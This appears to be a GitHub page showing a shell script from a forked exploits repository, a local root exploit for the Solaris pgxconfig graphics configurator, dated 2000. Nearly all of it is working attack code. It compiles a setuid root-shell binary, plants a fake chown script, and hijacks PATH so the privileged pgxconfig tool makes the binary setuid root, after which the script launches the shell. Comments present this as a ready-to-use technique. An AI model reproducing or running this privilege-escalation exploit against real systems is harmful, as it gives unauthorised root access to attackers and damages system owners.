forked from ProjectZeroDays/Exploits2
-
Notifications
You must be signed in to change notification settings - Fork 0
/
pgxconfig.sh
executable file
·41 lines (34 loc) · 1.07 KB
/
pgxconfig.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/local/bin/bash
# TechSource Raptor GFX configurator root exploit
#
# unfortunately a compiler must be installed to use this example
# exploit. however there's a million ways around this you know
# on my system , gcc isnt in my path
#
# Vulnerable:
# 2.5.1 Sparc
# 2.6 Sparc
# 7 Sparc
# 8 Sparc
PATH=$PATH:/usr/local/bin
# build a little prog nothing new here folks
echo '#include<stdio.h>' > ./x.c
echo 'int main(void) { setuid(0); setgid(0);
execl("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
gcc x.c -o foobar
rm -f ./x.c
# build a substitute chown command. i much prefer this over
# regular chown
echo "#!/bin/sh" > chown
echo "/usr/bin/chown root ./foobar" >> chown
echo "/usr/bin/chmod 4755 ./foobar" >> chown
chmod 0755 chown
# oooh look its the magical fairy path variable
export PATH=.:$PATH
# heres one way to skin a cat
# (theres more, some need valid devices. excercise for the readers)
/usr/sbin/pgxconfig -i
rm -f chown
./foobar
# www.hack.co.za [9 August 2000]#